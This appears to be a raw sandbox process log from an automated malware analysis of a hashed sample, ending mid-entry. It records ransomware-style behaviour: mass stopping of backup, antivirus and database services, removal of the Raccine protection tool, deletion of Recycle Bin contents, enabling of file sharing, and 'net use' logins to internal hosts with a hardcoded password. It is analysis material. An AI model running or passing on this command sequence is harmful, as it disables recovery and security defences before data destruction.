- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4556
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:3912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:4384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5888
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5816
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:4416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5860
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:5872
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:4156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:5784
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.14 /USER:
  2⤵
  PID:14048
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.24 /USER:
  2⤵
  PID:10836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.24 /USER:ragulin Steel_Rat_2020
  2⤵
  PID:12360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27 /USER:
  2⤵
  PID:11984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.30 /USER:
  2⤵
  PID:7224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.30 /USER:ragulin Steel_Rat_2020
  2⤵
  PID:7480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27 /USER:ragulin Steel_Rat_2020
  2⤵
  PID:7380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.33 /USER:
  2⤵
  PID:9512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.36 /USER:
  2⤵
  PID:9052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.41 /USER:
  2⤵
  PID:7704

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:5300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:5396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
1⤵
PID:4828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:5560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:12944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:13080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:13200

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:14224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:15392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:16332

C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
"2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
1⤵
PID:16360
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  PID:17152
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:16660
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:17208
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:14896
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:12864
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:16636
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:5472
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:16984
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:8088
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:9368
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:9076
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:8156
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:13772
- C:\Windows\system32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:14316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:7096
- C:\Windows\system32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:6592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:6688
- C:\Windows\system32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:7760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:7152
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:9680
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:8164
- C:\Windows\system32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:7488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:6236
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:15592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:6512
- C:\Windows\system32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:8060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:6324
- C:\Windows\system32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:17280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:15808
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:14960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5316
- C:\Windows\system32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:17324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:17648
- C:\Windows\system32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:17304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4912
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:13244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:15092
- C:\Windows\system32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:16976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:15872
- C:\Windows\system32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:17644
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:10044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:5720
- C:\Windows\system32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:5412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:14856
- C:\Windows\system32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:4892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:5524
- C:\Windows\system32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:18120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:8392
- C:\Windows\system32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:6212
- C:\Windows\system32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:16220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:13736
- C:\Windows\system32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:6284
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:16144
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:13616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:7508
- C:\Windows\system32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:15176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:17388
- C:\Windows\system32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:16276
- C:\Windows\system32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:15004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:14032
- C:\Windows\system32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:13644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5816
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:16240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:12524
- C:\Windows\system32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:6452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:11716
- C:\Windows\system32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:13336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:15100
- C:\Windows\system32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:6356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:15032
- C:\Windows\system32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:17604
- C:\Windows\system32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:7620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5356
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:7556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:15936
- C:\Windows\system32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:17592
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:15860
- C:\Windows\system32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:7752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:9020
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:15752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:5424
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:13404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6548
- C:\Windows\system32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:17760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:17756
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:17832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:17888
- C:\Windows\system32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:6944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:17468
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:17460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:15108
- C:\Windows\system32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:7256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:18048
- C:\Windows\system32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:9116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:16140
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:15972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:15876
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:15996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:14988
- C:\Windows\system32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:14916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:15788
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:17316
- C:\Windows\system32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:15756
- C:\Windows\system32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:14924
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:13324
- C:\Windows\system32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:12060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:13592
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:18028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:15840
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:17396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:14308
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:15992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:14276
- C:\Windows\system32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:11304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:13640
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:14028
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:6524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:6444
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:13488
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:10272
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:11248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:8312
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:11312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:7512
- C:\Windows\system32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:6408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:9072
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:11104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:14124
- C:\Windows\system32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:9400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQL Backups /y
    3⤵
    PID:11012
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:8728
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:9760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:6868
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:13704
- C:\Windows\system32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:6200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:7092
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:10396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:18056
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:11368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:10916
- C:\Windows\system32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:12648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetMsmqActivator /y
    3⤵
    PID:11076
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:13804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:3608
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:10484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:14332
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:6216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    3⤵
    PID:11912
- C:\Windows\system32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:10868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:9388
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:14140
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:9404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:11280
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:12528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:8612
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:8620
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:13528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:9784
- C:\Windows\system32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:14108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SamSs /y
    3⤵
    PID:9476
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:8976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:9340
- C:\Windows\system32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:7820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:7660
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:10148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:7396
- C:\Windows\system32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:13500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:7060
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:7980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:13536
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:5944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:14328
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:9624
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:6208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6992
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:12100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:13508
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:7316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
    3⤵
    PID:6516
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:7876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:7884
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:6860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer110 /y
    3⤵
    PID:6456
- C:\Windows\system32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:9924
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:12500
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:11300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:9232
- C:\Windows\system32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:8488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop POP3Svc /y
    3⤵
    PID:8448
- C:\Windows\system32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:9300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:11396
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:8584
- C:\Windows\system32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:7544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    3⤵
    PID:8868
- C:\Windows\system32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:6332
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:11536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:6908
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:10280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMGMT /y
    3⤵
    PID:8464
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:5828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:6432
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:8024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:13816
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:8980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Clean Service” /y
    3⤵
    PID:11948
- C:\Windows\system32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:8680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:7552
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:11056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:10904
- C:\Windows\system32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:8968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:10460
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:6112
- C:\Windows\system32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:13444
- C:\Windows\system32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:10556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:7724
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:6312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:10996
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:9008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:6864
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:7780
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:10968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:9792
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:5180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
    3⤵
    PID:5856
- C:\Windows\system32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:8888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:10116
- C:\Windows\system32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:6348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:8048
- C:\Windows\system32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:11004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:10420
- C:\Windows\system32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
